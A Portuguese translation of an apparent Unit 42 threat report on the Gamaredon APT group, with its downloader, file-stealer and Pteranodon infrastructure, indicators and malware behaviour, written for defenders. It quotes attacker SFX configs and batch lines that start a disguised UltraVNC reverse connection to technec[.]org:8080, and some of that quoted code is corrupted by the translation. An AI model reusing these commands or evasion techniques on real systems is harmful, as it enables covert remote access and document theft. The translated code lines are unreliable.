Sumário executivo
Desde novembro, as tensões geopolíticas entre a Rússia e a Ucrânia aumentaram dramaticamente. Estima-se que a Rússia já acumulou mais de 100.000 soldados na fronteira leste da Ucrânia, levando alguns a especular que uma invasão pode vir a seguir. Em 14 de janeiro de 2022, esse conflito se espalhou para o domínio cibernético, pois o governo ucraniano foi alvo de malware destrutivo (WhisperGate) e uma vulnerabilidade separada em OctoberCMS foi explorada para desfigurar vários sites do governo ucraniano. Enquanto a atribuição desses eventos estiver em andamento e não houver nenhum link conhecido para Gamaredon (também conhecido como Urso Primitivo), uma das ameaças persistentes avançadas mais ativas existentes visando a Ucrânia, prevemos que veremos atividades cibernéticas maliciosas adicionais nas próximas semanas à medida que o conflito evoluir. Também observamos atividade recente de Gamaredon. À luz disso, este blog fornece uma atualização sobre o grupo Gamaredon.
Desde 2013, pouco antes da anexação da península da Crimeia pela Rússia, o grupo Gamaredon concentrou principalmente suas campanhas cibernéticas contra funcionários e organizações do governo ucraniano. Em 2017, a Unidade 42 publicou sua primeira pesquisa documentando o kit de ferramentas em evolução do Gamaredon e nomeando o grupo e, ao longo dos anos, vários pesquisadores notaram que as operações e atividades de direcionamento desse grupo se alinham aos interesses russos. Esse link foi confirmado recentemente em 4 de novembro de 2021, quando o Serviço de Segurança da Ucrânia (SSU) atribuiu publicamente a liderança do grupo a cinco oficiais do Serviço Federal de Segurança da Rússia (FSB) designados para cargos na Crimeia. Paralelamente, a SSU também divulgou um relatório técnico atualizado documentar as ferramentas e ofícios empregados por este grupo.
Dada a situação geopolítica atual e o foco específico desse grupo de APT, a Unidade 42 continua monitorando ativamente os indicadores de suas operações. Ao fazer isso, mapeamos três grandes clusters de sua infraestrutura usados para dar suporte a diferentes propósitos de phishing e malware. Esses clusters são vinculados a mais de 700 domínios maliciosos, 215 endereços IP e mais de 100 amostras de malware.
Monitorando esses clusters, observamos uma tentativa de comprometer uma entidade governamental ocidental na Ucrânia em 19 de janeiro de 2022. Também identificamos uma potencial atividade de teste de malware e a reutilização de técnicas históricas envolvendo software de computação em rede virtual (VNC) de código aberto. As seções abaixo oferecem uma visão geral de nossas descobertas para ajudar entidades visadas na Ucrânia, bem como organizações de segurança cibernética, na defesa contra esse grupo de ameaças.
Infraestrutura de download do Gamaredon (grupo 1)
Os atores da Gamaredon seguem uma abordagem interessante quando se trata de construir e manter sua infraestrutura. A maioria dos atores opta por descartar domínios após seu uso em uma campanha cibernética para se distanciar de qualquer atribuição possível. No entanto, a abordagem da Gamaredon é única, pois eles parecem reciclar seus domínios girando-os consistentemente em novas infraestruturas. Um excelente exemplo pode ser visto no domínio libre4[.]space. A evidência de seu uso em uma campanha do Gamaredon foi sinalizada por um pesquisador já em 2019. Desde então, Cisco Talos e Threatbook também atribuíram firmemente o domínio à Gamaredon. No entanto, apesar da atribuição pública, o domínio continua a receber novos endereços de protocolo de Internet (IP) diariamente.
Girar para o primeiro IP da lista (194.58.100[.]17) revela um cluster de domínios girados e estacionados no IP exatamente no mesmo dia.
A rotação completa por todos os domínios e endereços IP resulta na identificação de quase 700 domínios. São domínios que já estão atribuídos publicamente ao Gamaredon devido ao uso em campanhas cibernéticas anteriores, misturados com novos domínios que ainda não foram usados. Traçar uma delimitação entre os dois torna-se então um exercício de rastreamento da infraestrutura mais recente.
O foco nos endereços IP vinculados a esses domínios nos últimos 60 dias resulta na identificação de 136 endereços IP exclusivos; Curiosamente, 131 desses endereços IP estão hospedados no sistema autônomo (AS) 197695 localizado fisicamente na Rússia e operados pela mesma entidade usada como registrador desses domínios, reg[.]ru . O número total de IPs se traduz na introdução de aproximadamente dois novos endereços IP todos os dias no pool de infraestrutura maliciosa da Gamaredon. Ao monitorar esse pool, parece que os atores estão ativando novos domínios, usando-os por alguns dias e adicionando os domínios a um pool de domínios que são alternados em várias infraestruturas de IP. Essa abordagem de jogo de shell oferece um grau de ofuscação para tentar se esconder dos pesquisadores de segurança cibernética.
Para os pesquisadores, torna-se difícil correlacionar cargas específicas a domínios e ao endereço IP para o qual o domínio foi resolvido no dia exato de uma campanha de phishing. Além disso, a técnica de Gamaredon fornece aos atores um grau de controle sobre quem pode acessar arquivos maliciosos hospedados em sua infraestrutura, pois o caminho de arquivo do localizador uniforme de recursos (URL) de uma página da Web incorporado em um downloader funciona apenas por um período de tempo finito. Depois que os domínios forem alternados para um novo endereço IP, as solicitações dos caminhos do arquivo de URL resultarão em um erro “404” de arquivo não encontrado para quem tentar estudar o malware.
Histórico do Grupo 1
Enquanto nos concentramos na infraestrutura atual do downloader, conseguimos rastrear a longevidade desse cluster até a origem em 2018. Certos domínios “marcadores”, como o libre4[.]space mencionado , ainda estão ativos hoje e também rastreados até março 2019 com propriedade aparentemente consistente. No mesmo intervalo de datas em março de 2019, um cluster de domínios foi observado em 185.158.114[.]107 com nomenclatura vinculada tematicamente – vários dos quais ainda estão ativos nesse cluster hoje.
Voltando ainda mais no tempo e entre domínios, encontra um domínio inicial aparente para esse cluster de infraestrutura, bitsadmin[.]space em 195.88.209[.]136, em dezembro de 2018.
Nós o vemos agrupado aqui com alguns domínios de sistema de nomes de domínio dinâmico (DNS). Domínios DNS dinâmicos também foram observados neste cluster em endereços IP posteriores, embora essa técnica pareça ter caído em desuso, pelo menos neste contexto, já que não há nenhum neste cluster atualmente ativo.
Downloaders iniciais
A busca de amostras conectadas à infraestrutura Gamaredon em repositórios de malware públicos e privados resultou na identificação de 17 amostras nos últimos três meses. A maioria desses arquivos foi compartilhada por entidades na Ucrânia ou continha nomes de arquivos ucranianos.
| Nome do arquivo | Tradução |
| Максим.docx | Maksim.docx |
| ПІДОЗРА РЯЗАНЦЕВА.docx | RAZANTSEV É SUSPEITO.docx |
| протокол допиту.docx | protocolo de interrogatório.docx |
| ТЕЛЕГРАММА.docx | TELEGRAM.docx |
| 2_Пам’ятка_про_процесуальні_права_та_обов’язки_потерпілого.docx | 2_Memorial_about_processal_rights_and_obligations_of_the_Victim.docx |
| 2_Porjadok_do_nakazu_111_vid_13.04.2017.docx | 2_Procedure_to_order_111_from_13.04.2017.docx |
| висновок тимошечкин.docx | conclusão Timoshechkin.docx |
| Звіт на ДМС за червень 2021 (Автосохраненный).doc | Relatório sobre a LCA de junho de 2021 (salvo automaticamente) .doc |
| висновок Кличко.docx | Conclusão de Klitschko.docx |
| Обвинувальний акт ГЕРМАН та ін.docx | Acusação GERMAN et al.docx |
| супровід 1-СЛ 10 місяців.doc | suporte 1-SL 10 meses.doc |
Tabela 1. Nomes de arquivos do downloader observados recentemente.
Uma análise desses arquivos descobriu que todos eles aproveitaram uma técnica de injeção remota de modelos que permite que os documentos retirem o código malicioso assim que forem abertos. Isso permite que o invasor tenha controle sobre qual conteúdo é enviado de volta à vítima em um documento benigno. Exemplos recentes de URLs de arquivo “ponto” de modelo remoto que esses documentos usam incluem o seguinte:
http://bigger96.allow.endanger.hokoldar[.]ru/[Redigido]/globe/endanger/lovers.cam
http://classroom14.nay.sour.reapart[.]ru/[Redigido]/bid/sour /glitter.kdp
http://priest.elitoras[.]ru/[Redigido]/pretend/pretend/principal.dot
http://although.coferto[.]ru/[Redigido]/amazing.dot
http:// source68.alternate.vadilops[.]ru/[Redigido]/clamp/interdependent.cbl
Muitos dos arquivos hospedados na infraestrutura Gamaredon são rotulados com extensões abstratas como .cam, .cdl, .kdp e outros. Acreditamos que este é um esforço intencional do ator para reduzir a exposição e detecção desses arquivos por antivírus e serviços de verificação de URL.
Uma análise mais profunda dos dois principais, hokoldar[.]ru e reapart[.]ru, fornece informações exclusivas sobre duas campanhas recentes de phishing. Começando com o primeiro domínio, os dados de DNS passivos mostram que o domínio primeiro foi resolvido para um endereço IP que foi compartilhado com outros domínios Gamaredon em 4 de janeiro. A Figura 2 acima mostra que hokoldar[.]ru continuou a compartilhar um endereço IP com libre4[ .]space em 27 de janeiro, associando-o novamente ao pool de infraestrutura Gamaredon. Nesse curto período, em 19 de janeiro, observamos uma tentativa de phishing direcionada contra uma entidade governamental ocidental que operava na Ucrânia.
Nessa tentativa, em vez de enviar um e-mail para o downloader diretamente para seu alvo, os atores aproveitaram uma busca de emprego e um serviço de emprego na Ucrânia. Ao fazer isso, os atores procuraram um anúncio de emprego ativo, carregaram seu downloader como um currículo e o enviaram por meio da plataforma de busca de emprego a uma entidade do governo ocidental. Dadas as etapas e a entrega de precisão envolvidas nesta campanha, parece que isso pode ter sido uma tentativa específica e deliberada de Gamaredon de comprometer essa organização governamental ocidental.
Expandindo além deste caso recente, também descobrimos evidências públicas de uma campanha Gamaredon visando o Serviço de Migração do Estado da Ucrânia. Em 1º de dezembro, um e-mail foi enviado de yana_gurina@ukr[.]net para 6524@dmsu[.]gov.ua. O assunto do e-mail era “RELATÓRIO DE NOVEMBRO” e anexado ao e-mail estava um arquivo chamado “Relatório sobre a LCA para junho de 2021 (Autosaved).doc”. Quando aberto, este documento do Word chama para reapart[.]ru. A partir daí, ele baixa e executa um arquivo de modelo de documento do Word remoto malicioso chamado glitter.kdp.
O CERT Estônia (CERT-EE), um departamento da Divisão de Segurança Cibernética da Autoridade do Sistema de Informação da Estônia, publicou recentemente um artigo sobre o Gamaredon que aborda o conteúdo retornado desses arquivos de modelo remotos. Para resumir suas descobertas sobre esse aspecto, o modelo remoto recupera um script VBS para executar que estabelece um check-in de comando e controle persistente (C2) e recuperará a próxima carga útil assim que o grupo Gamaredon estiver pronto para a próxima fase. No caso do CERT-EE, após seis horas, a infraestrutura voltou à vida e baixou um arquivo Self-eXtracting (SFX).
Esse download de um arquivo SFX é uma marca registrada do grupo Gamaredon e tem sido uma técnica observada há muitos anos para fornecer vários pacotes de software de computação em rede virtual (VNC) de código aberto que o grupo usa para manter o acesso remoto aos computadores das vítimas. A preferência atual do grupo parece ser o software UltraVNC de código aberto.
Arquivos SFX e UltraVNC
Os arquivos SFX permitem que alguém empacote outros arquivos em um arquivo e especifique o que acontecerá quando um usuário abrir o pacote. No caso do Gamaredon, eles geralmente o mantêm simples e agrupam um pacote contendo um script em lote simples e o software UltraVNC. Esse servidor VNC leve pode ser pré-configurado para iniciar uma conexão de volta a outro sistema, comumente chamado de túnel reverso, permitindo que invasores ignorem as restrições típicas de firewall; essas conexões reversas aparentemente não são iniciadas pelo invasor, mas vêm de dentro da rede onde a vítima existe. Para ilustrar como isso ocorre, analisaremos um dos arquivos SFX (SHA256: 4e9c8ef5e6391a9b4a705803dc8f2daaa72e3a448abd00fad36d34fe36f53887 ) que identificamos recentemente.
Ao construir um arquivo SFX, tem-se a opção de especificar uma série de comandos que serão executados após a extração bem-sucedida do arquivo. No caso do Gamaredon, a maioria dos arquivos SFX lançará um arquivo em lote, que está incluído no arquivo. Em alguns casos, o ator irá embaralhar os arquivos dentro do arquivo para tentar ofuscar o que eles são, mas geralmente uma opção de linha de comando pode ser encontrada, semelhante a esta:
;!@Instalar@!UTF-8!
InstallPath=”%APPDATA%\\Drivers”
GUIMode=”2″
SelfDelete=”1″
RunProgram=”hidcon:34679.cmd”
Isso extrairá os arquivos para %APPDATA%\\Drivers e, em seguida, executará o arquivo Windows Batch 34679.cmd em um console oculto. O uso do prefixo hidcon (console oculto) seguido por um nome de arquivo de quatro e cinco dígitos com uma extensão cmd é observado na maioria de nossas amostras rastreadas durante esse período.
Os seguintes arquivos foram incluídos neste arquivo específico:
| SHA256 | Nome do arquivo |
| 695fabf0d0f0750b3d53de361383038030752d07b5fc8d1ba6eb8b3e1e7964fa | 34679.cmd |
| d8a01f69840c07ace6ae33e2f76e832c22d4513c07e252b6730b6de51c2e4385 | MSRC4Plugin_for_sc.dsm |
| 393475dc090afab9a9ddf04738787199813f3974a22c13cb26f43c781e7b632f | QlpxpQpOpDpnpRpC.ini |
| ed13f0195c0cf8fc9905c89915f5b6f704140b36309c2337be86d87a8f5fef6c | UltraVNC.ini |
| 304d63fcd859ea71833cf13b8923f74ebe24abf750de9d01b7849b907f24d33b | YiIbIbIqIZIiIBI2.jpg |
| 1f1650155bfe9a4eb6b69365fc8a791281f866919202d44646e23e7f2f1d3db9 | kqT5TMTETyTJT4TG.jpg |
| 27285cb2b5bebd5730772b66b33568154cd4228c92913c5ef2e1234747027aa5 | owxxxGxzxxxxxxxExw.jpg |
| 3225058afbdf79b87d39a3be884291d7ba4ed6ec93d1c2010399e11962106d5b | rc4.key |
Tabela 2. Arquivos incluídos no exemplo SFX Archive.
Os arquivos em lote usam sequências alfanuméricas aleatórias para os nomes das variáveis e – dependendo da amostra – coletam informações diferentes ou usam domínios e nomes de arquivos diferentes; no entanto, no núcleo, cada um deles desempenha uma função específica – iniciar a conexão VNC reversa. O objetivo deste arquivo é obscurecer e executar o comando desejado: start “” “%CD%\sysctl.exe” -autoreconnect -id:[system media access control (MAC) address] -connect technec[.]org:8080
Nesse caso, o invasor define a variável nRwuwCwBwYwbwEwI duas vezes, o que acreditamos ser provavelmente devido à cópia e colagem de scripts anteriores (cobriremos isso com mais detalhes posteriormente). Essa variável, junto com as próximas, identificará o nome do processo sob o qual o malware se disfarçará, um identificador com o qual rastrear a vítima, o domínio do invasor remoto ao qual a conexão deve ser feita, a palavra connect , que é colocada no comando VNC e, em seguida, a porta, 8080 , que a conexão VNC usará. A cada passo, o ator tenta se misturar ao tráfego normal do usuário para permanecer fora do radar pelo maior tempo possível.
Depois que as variáveis são definidas, o script de linha de comando copia QlpxpQpOpDpnpRpC.ini para o nome executável que foi escolhido para esta execução e, em seguida, tenta eliminar qualquer processo legítimo usando o nome especificado antes de iniciá-lo. O nome do arquivo .ini é aleatório por arquivo, mas quase sempre acaba sendo o nome do próprio servidor VNC.
Como dito anteriormente, um benefício deste servidor VNC é que ele usará o arquivo de configuração fornecido (UltraVNC.ini) e – junto com os dois arquivos rc4.key e MSRC4Plugin_for_sc.dsm – criptografará a comunicação para ocultar ainda mais a detecção de rede Ferramentas.
Ainda não está claro quais são os três. jpg mostrados na Tabela 2 são usados, pois são dados codificados em base64 que provavelmente são codificados por XOR com uma chave longa. O Gamaredon usou essa técnica no passado, mas provavelmente são arquivos encenados para o invasor decodificar assim que se conectar ao sistema.
A seguir estão os parâmetros de inicialização do SFX de um arquivo separado para ilustrar como o ator tenta ofuscar os nomes dos arquivos, mas também que esses arquivos potencialmente preparados não estão presentes em todas as amostras.
InstallPath=”%USERPROFILE%\\Contacts”
GUIMode=”2″
SelfDelete=”1″
RunProgram=”hidcon:cmd.exe /c copy /y %USERPROFILE%\Contacts\18820.tmp %USERPROFILE%\Contacts\MSRC4Plugin_for_sc. dsm”
RunProgram=”hidcon:cmd.exe /c copy /y %USERPROFILE%\Contacts\25028.tmp %USERPROFILE%\Contacts\rc4.key”
RunProgram=”hidcon:cmd.exe /c copy /y %USERPROFILE% \Contacts\24318.tmp %USERPROFILE%\Contacts\UltraVNC.ini”
RunProgram=”hidcon:cmd.exe /c copy /y %USERPROFILE%\Contacts\25111.tmp %USERPROFILE%\Contacts\wn.cmd”
RunProgram= “hidcon:%USERPROFILE%\\Contacts\\wn.cmd”
Ao investigar esses arquivos, observamos o que acreditamos ser um desenvolvimento ativo nesses arquivos .cmd que ajudam a iluminar os processos do grupo Gamaredon.
Especificamente, em 14 de janeiro, a partir da 01h23 GMT, começamos a ver uploads do VirusTotal de um arquivo .cmd aparentemente em rascunho apontando para o mesmo servidor VNC controlado pelo invasor. Inicialmente, esses arquivos foram carregados no VirusTotal por meio da rede Tor e usaram o nome de processo svchosst sobre protocolo de controle de transmissão (TCP)/8080, aproveitando o identificador de segurança do Windows (SID) do usuário em vez do endereço MAC para a identificação do VNC. Os arquivos SFX simplesmente tinham o nome 1.exe.
@para /f %%i em (‘wmic useraccount where name^=’%USERNAME%’ get
sid ^| find “S-1″‘) defina JsVqVzVxVfVqVaVs=%%i
set ZGVxVkVIVUVlVgVb=technec[.]org
set qgSjSdSaSsSiSGS3 =svchosst
definir AVlflclclZlPlYlI=8080
definir djM8MfMRM0M5MBM0=conectar
Três minutos depois, vimos o mesmo arquivo carregado via Tor, mas o ator mudou a porta para TCP/80 e introduziu um bug no código que impede a execução correta. Observe também a mudança posicional das variáveis.
set djM8MfMRM0M5MBM0=onnect
set r8JgJJJHJGJmJHJ5=%RANDOM%
set ZGVxVkVIVUVlVgVb=technec[.]org
set qgSjSdSaSsSiSGS3=svchosst
set AVlflclclZlPlYlI=80
O bug é devido ao valor de onnect que está definido. Revendo como a conexão VNC reversa é iniciada, esse valor é usado em dois lugares: -autorec%djM8MfMRM0M5MBM0% e – %djM8MfMRM0M5MBM0% .
start “1” “%CD%\%qgSjSdSaSsSiSGS3%.exe”
-autorec%djM8MfMRM0M5MBM0% -id:%r8JgJJJHJGJmJHJ5%
-%djM8MfMRM0M5MBM0% %ZGVxVkVIVUVlVgVb%:80%AVlflclclZlPlYlI%
A segunda instância não contém o valor c necessário para soletrar corretamente a palavra e, portanto, apresenta um parâmetro inválido. Após mais três minutos, o ator carregou um arquivo SFX chamado 2.exe , contendo simplesmente test.cmd com a palavra teste no conteúdo.
Novamente, minutos depois, vimos 2.exe carregado com o test.cmd , mas desta vez continha a parte inicial do arquivo .cmd . No entanto, o ator esqueceu de incluir a string de conexão VNC.
Mas é aí que fica interessante – cerca de 15 minutos depois, vimos o conhecido upload 2.exe com test.cmd , mas desta vez estava sendo carregado diretamente por um usuário na Rússia a partir de um endereço IP público. Continuamos a observar esse padrão de uploads a cada poucos minutos, onde cada um era uma pequena iteração do anterior. A pessoa que carregava os arquivos parecia estar modificando rapidamente – e manualmente – o arquivo .cmd para restaurar a funcionalidade (embora o ator não tenha tido êxito nesta série de carregamentos).
Vários domínios e endereços IP foram codificados em amostras VNC que não estão relacionadas a nenhum dos clusters de domínio 1-3 (documentados em nossa lista completa de IoC).
SSL Pivot para Infraestrutura Adicional e Amostras
Ao realizar uma pesquisa histórica sobre a infraestrutura no cluster 1, descobrimos um certificado autoassinado associado ao endereço IP do cluster 1 92.242.62[.]96:
Serial: 373890427866944398020500009522040110750114845760
SHA1: 62478d7653e3f5ce79effaf7e69c9cf3c28edf0c
Emitido: 2021-01-27
Expira:
2031-01-295.crelcom
Embora o registro WHOIS do endereço IP da Crelcom LLC esteja registrado em um endereço em Moscou, o administrador técnico listado para o bloco de rede que contém o endereço IP está registrado em um endereço em Simferopol, Crimeia. Também traçamos as origens aparentes da Crelcom até Simferopol, na Crimeia.
Este certificado refere-se a 79 endereços IP:
- O endereço IP de nome comum – sem domínios Gamaredon
- Um endereço IP é vinculado ao cluster 1 acima 92.242.62[.]96)
- 76 endereços IP são vinculados a outra coleção distinta de domínios – “cluster 2”
- 1 endereço IP nos levou a outro cluster distinto, “cluster 3” (194.67.116[.]67)
Não encontramos quase nenhuma sobreposição de endereços IP entre esses clusters separados.
Ladrão de Arquivos (Grupo 2)
Dos 76 endereços IP que associamos ao cluster 2, 70 deles confirmaram links para domínios C2 associados a uma variante da ferramenta de roubo de arquivos do Gamaredon. Nos últimos três meses, identificamos 23 amostras desse malware, doze das quais parecem ter sido compartilhadas por entidades na Ucrânia. Os domínios C2 nessas amostras incluem:
| Domínio | Visto pela primeira vez |
| jolotras[.]ru | 16/12/2021 |
| moolin[.]ru | 11/10/2021 |
| naniga[.]ru | 02/09/2021 |
| nonimak[.]ru | 02/09/2021 |
| bokuwai[.]ru | 02/09/2021 |
| krashand[.]ru | 17/06/2021 |
| gorigan[.]ru | 25/05/2021 |
Tabela 3. Domínios C2 de ladrão de arquivos recentes.
Como você pode ver, alguns desses domínios foram estabelecidos meses atrás, mas apesar de sua idade, eles continuam desfrutando de reputações benignas. Por exemplo, apenas cinco dos 93 fornecedores consideram o domínio krashand[.]ru malicioso no VirusTotal.
A revisão dos logs de DNS passivo (pDNS) para esses domínios revela rapidamente uma longa lista de subdomínios associados a cada um. Alguns dos subdomínios seguem um padrão padronizado. Por exemplo, vários dos domínios usam as primeiras letras do alfabeto ( a , b , c ) em uma combinação repetida. Por outro lado, jolotras[.]ru e moolin[.]ruuse caracteres alfanuméricos aleatórios. Acreditamos que esses subdomínios são gerados dinamicamente pelo ladrão de arquivos quando ele estabelece uma conexão com seu servidor C2. Como tal, contar o número de subdomínios associados a um domínio C2 específico fornece uma medida aproximada do número de entidades que tentaram se conectar ao servidor. No entanto, é importante observar também que o número de entradas de pDNS também pode ser distorcido por pesquisadores e produtos de segurança cibernética que podem estar avaliando as amostras maliciosas associadas a um domínio C2 específico.
| Subdomínios |
| 637753576301692900[.]jolotras.ru |
| 637753623005957947[.]jolotras[.]ru |
| 637755024217842817.jolotras[.]ru |
| a.nonimak[.]ru |
| aaaa.nonimak[.]ru |
| aaaaa.nonimak[.]ru |
| aaaaaa.nonimak[.]ru |
| 0enhzs.moolin[.]ru |
| 0ivrlzyk.moolin[.]ru |
| 0nxfri.moolin[.]ru |
Tabela 4. Nomenclatura de subdomínios para infraestrutura de ladrão de arquivos.
Ao mapear esses domínios para sua infraestrutura C2 correspondente, descobrimos que os domínios se sobrepõem em termos dos endereços IP para os quais apontam. Isso nos permitiu identificar a seguinte infraestrutura ativa:
| Endereço de IP | Visto pela primeira vez |
| 194.58.92[.]102 | 14/01/2022 |
| 37.140.199[.]20 | 10/01/2022 |
| 194.67.109[.]164 | 16/12/2021 |
| 89.108.98[.]125 | 26/12/2021 |
| 185.46.10[.]143 | 15/12/2021 |
| 89.108.64[.]88 | 29/10/2021 |
Tabela 5. Infraestrutura IP do ladrão de arquivos recente.
É importante notar que toda a infraestrutura do ladrão de arquivos parece estar hospedada no AS197695, o mesmo AS destacado anteriormente. Historicamente, vimos os domínios C2 apontarem para vários sistemas autônomos (AS) globalmente. No entanto, no início de novembro, parece que os atores consolidaram toda a infraestrutura de ladrões de arquivos nos ASs russos – predominantemente este único AS.
Ao mapear os padrões envolvidos no uso dessa infraestrutura, descobrimos que os domínios são alternados entre os endereços IP de maneira semelhante à infraestrutura do downloader discutida anteriormente. Um domínio malicioso pode apontar para um dos endereços IP do servidor C2 hoje enquanto aponta para um endereço diferente amanhã. Isso adiciona um grau de complexidade e ofuscação que torna difícil para os defensores da rede identificar e remover o malware das redes infectadas. A descoberta de um domínio C2 nos logs de rede, portanto, exige que os defensores pesquisem em seu tráfego de rede a coleção completa de endereços IP que o domínio malicioso resolveu ao longo do tempo. Como exemplo, moolin[.]ru apontou para 11 endereços IP desde o início de outubro, alternando para um novo IP a cada poucos dias.
| Endereço de IP | País | COMO | Visto pela primeira vez | Visto pela última vez |
| 194.67.109[.]164 | RU | 197695 | 28-12-2021 | 27-01-2022 |
| 185.46.10[.]143 | RU | 197695 | 16-12-2021 | 26-12-2021 |
| 212.109.199[.]204 | RU | 29182 | 15-12-2021 | 15-12-2021 |
| 80.78.241[.]253 | RU | 197695 | 19-11-2021 | 14-12-2021 |
| 89.108.78[.]82 | RU | 197695 | 16-11-2021 | 18-11-2021 |
| 194.180.174[.]46 | MD | 39798 | 15-11-2021 | 15-11-2021 |
| 70.34.198[.]226 | SE | 20473 | 14-10-2021 | 30-10-2021 |
| 104.238.189[.]186 | FR | 20473 | 13-10-2021 | 14-10-2021 |
| 95.179.221[.]147 | FR | 20473 | 13-10-2021 | 13-10-2021 |
| 176.118.165[.]76 | RU | 43830 | 12-10-2021 | 13-10-2021 |
Tabela 6. Infraestrutura IP do ladrão de arquivos recente
Mudando o foco para o próprio malware, as amostras de ladrões de arquivos se conectam à infraestrutura C2 de uma maneira única. Em vez de se conectar diretamente a um domínio C2, o malware realiza uma pesquisa de DNS para converter o domínio em um endereço IP. Depois de concluído, ele estabelece uma conexão HTTPS diretamente com o endereço IP. Por exemplo:
Domínio C2: moolin[.]ru
Endereço IP C2: 194.67.109[.]164
Comunicações C2: https://194.67.109[.]164/zB6OZj6F0zYfSQ
Essa técnica de criar distância entre o domínio e a infraestrutura física C2 parece ser uma tentativa de contornar a filtragem de URL:
- O próprio domínio é usado apenas em uma solicitação inicial de DNS para resolver o endereço IP do servidor C2 – nenhuma conexão real é tentada usando o nome de domínio.
- A identificação e o bloqueio de um domínio não afetam os comprometimentos existentes, pois o malware continuará a se comunicar diretamente com o servidor C2 usando o endereço IP – mesmo que o domínio seja posteriormente excluído ou alternado para um novo IP – desde que o malware continue a corre.
Uma amostra recente de ladrão de arquivos que analisamos (SHA256: f211e0eb49990edbb5de2bcf2f573ea6a0b6f3549e772fd16bf7cc214d924824 ) foi encontrada como um binário .NET que foi ofuscado para tornar a análise mais difícil. A primeira coisa que salta à vista ao revisar esses arquivos são seus tamanhos. Este arquivo em particular tem mais de 136 MB de tamanho, mas observamos arquivos indo até 200 MB e além. É possível que esta seja uma tentativa de contornar a análise de sandbox automatizada, que geralmente evita a verificação de arquivos tão grandes. Também pode ser simplesmente um subproduto das ferramentas de ofuscação que estão sendo usadas. Seja qual for o motivo do tamanho do arquivo grande, ele tem um preço para o invasor, pois os executáveis desse tamanho se destacam na revisão. Transmitir um arquivo tão grande para uma vítima se torna uma tarefa muito mais desafiadora.
A ofuscação dentro desta amostra é relativamente simples e depende principalmente da definição de matrizes e da concatenação de strings de caracteres únicos em alto volume em centenas de linhas para tentar ocultar a construção da string real dentro do ruído.
Ele começa verificando a existência do Mutex Global\lCHBaUZcohRgQcOfdIFaf , que, se presente, indica que o malware já está em execução e fará com que o ladrão de arquivos saia. Em seguida, ele criará a pasta C:\Users\%USER%\AppData\Local\TEMP\ModeAuto\icons , onde as capturas de tela que são feitas a cada minuto serão armazenadas e transmitidas para o servidor C2 com o formato de nome YYYY-MM -DD-HH-MM.jpg.
Para identificar o endereço IP do servidor C2, o ladrão de arquivos gerará uma sequência aleatória de caracteres alfanuméricos entre oito e 23 caracteres, como 9lGo990cNmjxzWrDykSJbV.jolotras[.]ru.
Como mencionado anteriormente, assim que o ladrão de arquivos recuperar o endereço IP desse domínio, ele não usará mais o nome do domínio. Em vez disso, todas as comunicações serão diretas com o endereço IP.
Durante a execução, ele procurará em todas as unidades fixas e de rede conectadas ao computador as seguintes extensões:
.doc
.docx
.xls
.rtf
.odt
.txt
.jpg
.pdf
.ps1
Quando possui uma lista de arquivos no sistema, ele começa a criar uma string para cada um que contém o caminho do arquivo, o tamanho do arquivo e a última vez que o arquivo foi gravado, semelhante ao exemplo abaixo:
C:\cygwin\usr\share\doc\bzip2\manual.pdf2569055/21/2011 15:17:02
O ladrão de arquivos pega essa string e gera um hash MD5 dela, resultando na seguinte saída para este exemplo:
FB-17-F1-34-F4-22-9B-B4-49-0F-6E-3E-45-E3-C9-FA
Em seguida, ele remove os hífens do hash e converte todas as letras maiúsculas em minúsculas. Esses hashes MD5 são então salvos no arquivo C:\Users\%USER%\AppData\Local\IconsCache.db . A nomeação deste arquivo é outra tentativa de ocultar à vista de todos ao lado do legítimo IconCache.db.
O malware usa esse banco de dados para rastrear arquivos exclusivos.
O malware gerará então um caminho de URL com caracteres alfanuméricos para sua comunicação C2, usando a técnica DNS-IP ilustrada anteriormente com o exemplo de domínio moolin[.]ru:
https://194.67.109[.]164/zB6OZj6F0zYfSQ
Abaixo está a lista completa de domínios atualmente resolvendo para endereços IP do cluster 2:
| Domínio | Registrado |
| jolotras[.]ru | 16/12/2021 |
| moolin[.]ru | 11/10/2021 |
| bokuwai[.]ru | 02/09/2021 |
| naniga[.]ru | 02/09/2021 |
| nonimak[.]ru | 02/09/2021 |
| bilargo[.]ru | 23/07/2021 |
| krashand[.]ru | 17/06/2021 |
| firtabo[.]ru | 28/05/2021 |
| gorigan[.]ru | 25/05/2021 |
| firasto[.]ru | 21/05/2021 |
| myces[.]ru | 24/02/2021 |
| teroba[.]ru | 24/02/2021 |
| bacilo[.]ru | 15/02/2021 |
| circula[.]ru | 15/02/2021 |
| megatos[.]ru | 15/02/2021 |
| phymateus[.]ru | 15/02/2021 |
| cerambycidae[.]ru | 22/01/2021 |
| coleópteros[.]ru | 22/01/2021 |
| danainae[.]ru | 22/01/2021 |
Tabela 7 . Todos os domínios do cluster 2.
Pteranodonte (Grupo 3)
O único endereço IP restante relacionado ao certificado SSL não estava relacionado ao cluster 1 ou ao cluster 2 e, em vez disso, nos levou a um terceiro cluster distinto de domínios.
Esse cluster final parece servir como infraestrutura C2 para uma ferramenta de administração remota personalizada chamada Pteranodon. A Gamaredon tem usado, mantido e atualizado o desenvolvimento deste código por anos. Seu código contém funções antidetecção projetadas especificamente para identificar ambientes de sandbox para impedir tentativas de detecção de antivírus. Ele é capaz de baixar e executar arquivos, capturar screenshots e executar comandos arbitrários em sistemas comprometidos.
Nos últimos três meses, identificamos 33 amostras de Pteranodon. Esses exemplos geralmente são denominados 7ZSfxMod_x86.exe . Girando nesse cluster, identificamos a seguinte infraestrutura C2:
| Domínio | Registrado |
| takak[.]ru | 18/09/2021 |
| rimien[.]ru | 18/09/2021 |
| maizuko[.]ru | 02/09/2021 |
| iruto[.]ru | 02/09/2021 |
| gloritapa[.]ru | 05/08/2021 |
| gortisir[.]ru | 05/08/2021 |
| gortomalo[.]ru | 05/08/2021 |
| langosta[.]ru | 25/06/2021 |
| malgaloda[.]ru | 08/06/2021 |
Tabela 8. Domínios do cluster 3.
Novamente observamos o envelhecimento da reputação do domínio, como visto no cluster 2.
Um padrão de nomenclatura interessante é visto no cluster 3 – também visto em alguns nomes de host e subdomínio do cluster 1. Vemos esses atores usando palavras em inglês, aparentemente agrupadas pelas duas ou três primeiras letras. Por exemplo:
deep-rooted.gloritapa[.]ru
deep-sinking.gloritapa[.]ru deepwaterman.gloritapa[.
]ru
deepnesses.gloritapa[.]ru
deep-lunged.gloritapa[.]ru
deerfood.gortomalo[.]ru
deerbrook. gortomalo[.]ru
apesar.gortisir[.]ru
des.gortisir[.]ru
desejo.gortisir[.]ru
Esse padrão difere dos do cluster 2, mas foi observado em alguns domínios do cluster 1 (dropper), por exemplo:
alley81.salts.kolorato[.]ru
